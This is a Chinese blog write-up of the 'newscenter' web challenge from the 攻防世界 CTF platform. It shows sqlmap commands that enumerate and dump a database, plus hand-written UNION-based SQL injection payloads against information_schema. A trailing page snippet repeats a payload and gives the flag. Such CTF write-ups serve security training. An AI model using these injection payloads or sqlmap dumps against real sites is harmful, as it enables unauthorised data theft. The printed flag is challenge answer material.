攻防世界 WEB newscenter

最新推荐文章于 2023-06-12 10:04:13 发布
最新推荐文章于 2023-06-12 10:04:13 发布
阅读量298 收藏
点赞数
分类专栏: 攻防世界 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/119344863
版权

看到提交框就条件反射sql注入
先sqlmap跑,能跑的情况下优先
把burpsuite抓到的包保存为1.txt

sqlmap -l 1.txt
sqlmap -l 1.txt  --dbs
sqlmap -l 1.txt -D news --tables
sqlmap -l 1.txt -D news -T secret_tables --columns --dump

一套组合拳打完,成功拿到flag
当然可以自己手工注入

' and 0 union select 1,table_schema,table_name from information_schema.columns # //and 0用于过滤默认的自带输出,table_schema数据库名,table_name表名

爆出表名,就知道该爆列名了

' and 0 union select 1,column_name,3 from information_schema.columns where table_name='secret_table' #

知道列名就能拿到flag

' and 0 union select 1,2,fl4g from secret_table #

参考视频链接:https://www.bilibili.com/video/BV1Lq4y1p7iJ/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BurpSuite数据的导出及导入
Junior_Q的博客
11-30 5997
这里写自定义目录标题说明导出导入 说明 在使用BurpSuite时难免会出现中途要关闭burp可是需要保存当前的数据记录,或者想要将当前的数据记录分享给他人,那么就需要用到BurpSuite的导出和导入功能了。 导出 这是我们的浏览的数据,现在将这些记录进行导出 点击Project—>Save copy 这里选择你想要保存的数据(根据个人需要进行选择),然后点击Next 这里默认选择第一项,点击Next 选择要保存的路径 点击Next 到这就已经导出成功了 这里你想要直接退出burp
newscenter_app
02-20
使用异步Web取脚本,每3小时更新一次新闻报道。特征从顶级主流媒体网站的首页显示15个热门新闻头条。 单击每个标题将使用户链接到实际文章。未来的改进添加其他新闻站点以进行更多样化的比较添加下拉菜单,允许...
Burip Siute 手机APP
weixin_49349476的博客
04-20 1606
这里的代理服务器IP是我们在电脑上查找到的无线局域的ip,端口与burp代理上设置的端口一致,注意:虽然看到仿佛已经填好了,其实不是,点击之后就发现没有填,需要点击输入。首先电脑需要连接到 WiFi,不能使用有线网络,这样才能让 手机和电脑处于同一网络环境(如果台式机的有线和手机 WiFi 是同一个网络环境也可以。进入手机的Wlan设置,点击正在连接的网络,长按就会弹出删除网络和修改网络,两个选项,选择修改网络。在burp上设置代理,在指定地址中,选择我们在电脑上查找到的无线局域网的ip地址。
burpsuite保存现有数据记录&导入之前的记录
热门推荐
Fly_鹏程万里
03-27 1万+
前言 有时候我们在做渗透测试的时候,我们使用burpsuite取网络数据,并且做了刚好一半,但是却要关机(比如说快没电了,或者说因为要外出携带电脑为了电脑号所以要关机等等),在这种情况下,如果你关机,那么所有之前的数据记录将会变为空,那么如何操作呢?burpsuite 1.7系列提供了这种便捷。 保存现有数据 现有数据 Burp->Save state: 选择想要...
Burp Suite取gzip数据
zyw_anquan的专栏
03-02 6779
Burp Suite取gzip数据 测试环境 [+]JDK 1.8.0_45 [+]Burp Suite 1.6.27 [+]WinHex 14.2 SR-3 [+]WinRAR 5.21 下载地址: [+]JDK 1.8.0_45 [+]Burp Suite 1.6.27 一、 Burp Suite方式详见:Burp SuiteHTTPS数据(通用)
BurpSuite 的导入和导出
kevinhanser
07-12 9691
使用的版本为 burpsuite_pro_v2020.6.jar BurpSuite 的导入和导出 2020年7月12日10:54:51【原创】 1. 简介 主要目的是使用burp记录浏览记录,并保存成文件 2. 导出 导出整个项目成 .burp 文件 位置:Project -> Save copy 优点:跨平台分享项目中所有浏览记录 测试:二进制文件 先尽情的,然后保存即可,可以只选择保存 Proxy的内容,也可以全都保存。 2. 导出单个浏览记录 位置: Proxy -> 选.
web安全第二天:burpsuite基本用法
cc777777777的博客
02-21 129
burpsuite基本用法
burpsuite 2021 保存现有数据记录&导入之前的记录
Hallo_ZM的博客
10-27 6874
前言: 有时候我们在做渗透测试的时候,我们使用burpsuite取网络数据,并且做了刚好一半,但是却要关机(比如说快没电了,或者说因为要外出携带电脑为了电脑号所以要关机等等),在这种情况下,如果你关机,那么所有之前的数据记录将会变为空,那么如何操作呢? 保存现有项目: 1.首先点开Project 2.然后点击Save copy 3.选择想要保存的模块 4.下一步 5.选择保存文件夹即可 导入burpsuite项目(方法一): 1.点击如下选项 2.选择项目文件即可 导入bur
NewsCenter
06-23
ASP(Active Server Pages)是微软开发的一种服务器端脚本环境,用于创建动态网页或Web应用程序。在ASP中,开发者可以使用VBScript或JScript编写脚本,服务器端执行这些脚本并返回HTML到客户端浏览器。在【新闻中心...
PyPI 官网下载 | newscenter-2.0.4.tar.gz
01-14
在Python的世界里,PyPI(Python Package Index)是最重要的资源库,它为全球的开发者提供了一个集中地,可以发布、分享并下载Python模块、库和其他可重用代码。"newscenter-2.0.4.tar.gz"这个压缩正是PyPI上一个...
Burp Suite---Intruder小技巧
08-16
Burp Suite---Intruder小技巧
Python库 | newscenter-1.6.3.tar.gz
05-19
资源分类:Python库 所属语言:Python 资源全名:newscenter-1.6.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | newscenter-2.0.23.tar.gz
04-12
资源分类:Python库 所属语言:Python 资源全名:newscenter-2.0.23.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
PHP与JSON的一些常用操作
HelloWorld
09-30 2004
PHP把数据写入JSON文件 <?php // 生成一个PHP数组 $data = array (); $data ["fruit"] = "apple" ; $data ["animal"] = "tiget"; // 把PHP数组转成JSON字符串,写入文件 $json_string = json_encode( $data ); ?> PHP读取JSON数据? <?php // 从文件中读取数据到PHP变量 $str = file_get_contents ( 'one
(sqlmap)【sqli-labs11-20】爆破本地数据文件
07-07 1283
【SQLMAP-数据本地爆破】
工具Burp Suite使用
FANHAOM的博客
07-21 595
TOMCAT禁用OPTIONS请求 老项目等保要求进行安全测试,web渗透测试常用工具进行攻击,自己修复完漏洞没法测试简单学习了Burp Suite。 下载地址 https://down.52pojie.cn/Tools/Network_Analyzer/ 文件名:Burp_Suite_Pro_v1.7.37_Loader_Keygen.zip 解压后双击运行jar 点击run进入Burp Suite 配置ie浏览器 intercept is on 表示开启拦截action-send to rep
Burpsuite+Proxifier取exe数据
qq_50854662的博客
06-12 1405
首先我们打开Burpsuite,Proxy->Proxy Listeners->Options添加一个代理服务器和端口,但得注意下不要使用已被占用的端口,否则可能会监听失败。 为了能顺利取HTTPS,我们还得先导入下证书,直接访问 http://127.0.0.1:8080/ 在右上角CA Certificate下载证书,http://burp 得在浏览器设置好代理才能访问。 Win+R运行输入certmgr.msc,找到“受信任的根证书颁发机构”证书右键->所有任务->导入->把刚下载的cacert.
Burp Suite取安卓手机数据(HTTPS)
weixin_42299610的博客
03-19 3349
1、电脑放热点,然后用手机连接热点。打开手机网络设置,长按连接的无线网络名称,修改网络。高级设置—代理—在服务器主机名输入主机IP地址,端口设置8080。 2、设置Burp 监听端口,可以选择All interfaces,或者也可以选择Spercific interfaces——设置主机IP地址,端口8080。 3、在Burp–>procy–>option–>edit设置监听主...
攻防世界 WEB Web_python_block_chain
qq_41696858的博客
09-15 6190
这题是区块链题,对区块链不是很了解,想了解原理的建议看这一篇 https://blog.csdn.net/hxhxhxhxx/article/details/108111692 简单介绍一下双花攻击的原理吧,就是区块链是去中心化账本,而且默认长度最长的是主链 如果用户自持有的账本长度大于中心化中心的账本,那么所有的节点都会以当前用户的账本覆盖当前持有的账本,这边是0确认, 就是整个链里就你一个人,所以没有人跟你竞争,所以一定会成功。具体的也不清楚,直接看大佬的脚本吧 具体要改的就是url的三个参数和三个ad
攻防世界 newscenter
最新发布
09-08
攻防世界NewsCenter是一个基于React构建的前端应用程序,它提供了实时版本的背景和概述,展示了当前主流媒体如何报道当下的主题。你可以通过查看CNN、Fox News、NBC、NYTimes和Huffington Post主页上的精选文章来了解更多信息。此外,NewsCenter还涉及到CTF(Capture The Flag)比赛和SQL注入攻击的内容。在这个应用程序中,有两个表,分别是news和secret_table,我们需要从secret_table表中找到flag(标志)。通过构造SQL语句,并利用搜索(search)功能,我们可以使用union select和group_concat函数来获取所需的信息。最后,通过执行以下SQL语句search=-1' union select 1,version(),group_concat(fl4g) from secret_table --,我们可以得到flag的值为QCTF{sq1_inJec7ion_ezzz}。这是一个CTF比赛中的一个关卡,攻防世界NewsCenter也是为了帮助新手了解和学习Web安全而创建的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值